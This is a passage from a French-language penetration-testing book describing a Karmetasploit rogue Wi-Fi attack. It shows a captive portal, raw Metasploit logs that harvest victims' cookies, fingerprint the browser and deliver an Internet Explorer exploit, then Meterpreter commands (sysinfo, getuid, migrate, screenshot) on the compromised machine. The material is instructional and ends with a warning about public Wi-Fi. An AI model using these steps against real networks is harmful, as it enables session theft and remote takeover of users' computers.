À ce stade, l’utilisateur n’a pas de nouveaux messages, alors il décide de faire un peu de navigation
sur le Web. Lorsque le navigateur s’ouvre, un portail captif est présenté à l’utilisateur (voir Figure 12.1).
Fig ure 12.1
Karmetasploit captive portal.
Pendant que l’utilisateur, devant son ordinateur, se demande ce qu’il se passe, Karmetasploit est occupé à configurer l’attaque pour capturer les cookies, mettre en place de faux e-mails, DNS et autres serveurs et lancer des exploits contre le navigateur de la cible. C’est le résultat du contenu de notre karma.rc file.
Bien entendu, une dose de chance est nécessaire dans cette attaque. Le navigateur affichera une page de chargement pendant que les exploits seront lancés. Si l’utilisateur est impatient, il peut simplement fermer la fenêtre du navigateur, ce qui empêchera nos exploits d’agir.
Ci-dessous, vous pouvez voir la quantité massive de traces générées par cette attaque :
[*]
HTTP REQUEST 10.0.0.100 > www.microsoft.com:80 GET /isapi/redir.dll Windows IE 6.0 cookies=WT_NVR=0=/:1=downloads:2=downloads/en;
WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203;MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3;
A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C86418EBC913CE45C4326AE [*] Request ’/ads’ from 10.0.0.100:1371
❶[*] HTTP REQUEST 10.0.0.100 > adwords.google.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > blogger.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > careerbuilder.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > ecademy.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > facebook.com:80 GET /forms.html Windows IE 6.0 cookies=
. . . SNIP . . .
[*] HTTP REQUEST 10.0.0.100 > www.slashdot.org:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.twitter.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] Request ’/ads?sessid=V2luZG93czpYUDpTUDI6ZW4tdXM6eDg2Ok1TSUU6Ni4wO1NQMjo%3d’ from 10.0.0.100:1371
❷[*] JavaScript Report: Windows:XP:SP2:en-us:x86:MSIE:6.0;SP2:
❸[*] Responding with exploits
[*] HTTP REQUEST 10.0.0.100 > www.xing.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.yahoo.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.ziggs.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > xing.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > yahoo.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > ziggs.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > care.com:80 GET / Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > www.care2.com:80 GET / Windows IE 6.0 cookies=
❹[*]
HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203;
MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3;A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!;
MUID=C7149D932C86418EBC913CE45C4326AE [*] HTTP 10.0.0.100 attempted to download an ActiveX control
[*]
HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203;
MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3;A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!;
MUID=C7149D932C86418EBC913CE45C4326AE [*] HTTP 10.0.0.100 attempted to download an ActiveX control
❺[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 10.0.0.100:1371...
[*]
HTTP REQUEST 10.0.0.100 > activex.microsoft.com:80 POST /objects/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203;
MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3;A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!;
MUID=C7149D932C86418EBC913CE45C4326AE [*] HTTP 10.0.0.100 attempted to download an ActiveX control
[*]
HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203;
MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!;
MUID=C7149D932C86418EBC913CE45C4326AE
. . . SNIP . . .
[*] HTTP 10.0.0.100 attempted to download an ActiveX control
[*]
HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203;
MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!;
MUID=C7149D932C86418EBC913CE45C4326AE
[*]
HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203;
MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!;
MUID=C7149D932C86418EBC913CE45C4326AE
[*]
HTTP REQUEST 10.0.0.100 > codecs.microsoft.com:80 POST /isapi/ocget.dll Windows IE 6.0 cookies=WT_FPC=id=111.222.333.444-1008969152.30063513:lv=1267703430218:ss=1267703362203;
MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!;
MUID=C7149D932C86418EBC913CE45C4326AE [*] Sending EXE payload to 10.0.0.100:1371...
[*] Sending stage (748032 bytes) to 10.0.0.100
❻[*] Meterpreter session 1 opened (10.0.0.1:3333 -> 10.0.0.100:1438)
Dans ces traces, vous pouvez voir en ❶ que Metasploit commence par faire croire à la cible que divers sites web populaires sont en fait situés sur la machine attaquante. Puis, en ❷, il utilise du JavaScript afin de déterminer le système d’exploitation et le navigateur de la cible et répond en ❸
avec des exploits basés sur cette empreinte. En ❹ la cible est présentée avec un contrôle ActiveX malveillant, provoquant la fameuse barre jaune d’Internet Explorer (voir Figure 12.1). Vous pouvez également voir, caché dans les traces en ❺, qu’un exploit a été lancé contre la cible. Après un bref instant, vous voyez en ❻ que l’exploit a réussi et qu’une session Meterpreter a été ouverte sur le PC cible !
De retour à msfconsole, nous pouvons interagir avec la session qui a été créée et vérifier quelles sont les permissions que nous avons acquises sur la cible. Rappelez-vous, lorsque vous exploitez un
navigateur, c’est toujours une bonne idée de migrer votre processus en dehors du navigateur web au cas où ce dernier serait refermé.
meterpreter > se ssions -i 1 [*] Starting interaction with 1...
meterpreter > sysinfo Computer : V-XP-SP2-BARE
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86 Language : en_US meterpreter > g e tuid
Server username: V-XP-SP2-BARE\Administrator meterpreter > run m ig rate -f
[*] Current server process: jEFiwxBKyjoHGijtP.exe (3448) [*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2232
[*] New server process: notepad.exe (2232) meterpreter > sc re e nshot
Screenshot saved to: /opt/metasploit3/msf3/rkGrMLPa.jpeg meterpreter >
Comme il s’agit d’une installation par défaut de Windows XP SP2 avec le très peu fiable Internet Explorer 6 (les deux n’étant absolument pas à jour), la cible n’a même pas besoin d’accepter et d’installer le contrôle ActiveX malveillant.
Conclusion
Les attaques contre les réseaux sans fil ont été un sujet populaire pendant un certain temps. Bien que cette attaque puisse prendre un peu de temps pour sa configuration, imaginez son succès contre un certain nombre de cibles configurées de façon similaire et situées dans une zone à fort trafic ou publique. Cette approche d’attaque de réseau client sans fil est populaire parce qu’elle est plus facile qu’une attaque brutale contre une infrastructure sans fil bien sécurisée.
Maintenant que vous avez vu avec quelle facilité on peut procéder à ce type d’attaque, vous
réfléchirez probablement à deux fois avant d’utiliser des réseaux sans fil publics. Êtes-vous sûr que le café offre gratuitement une connexion Wi-Fi ? Ou bien quelqu’un a-t-il lancé Karmetasploit ?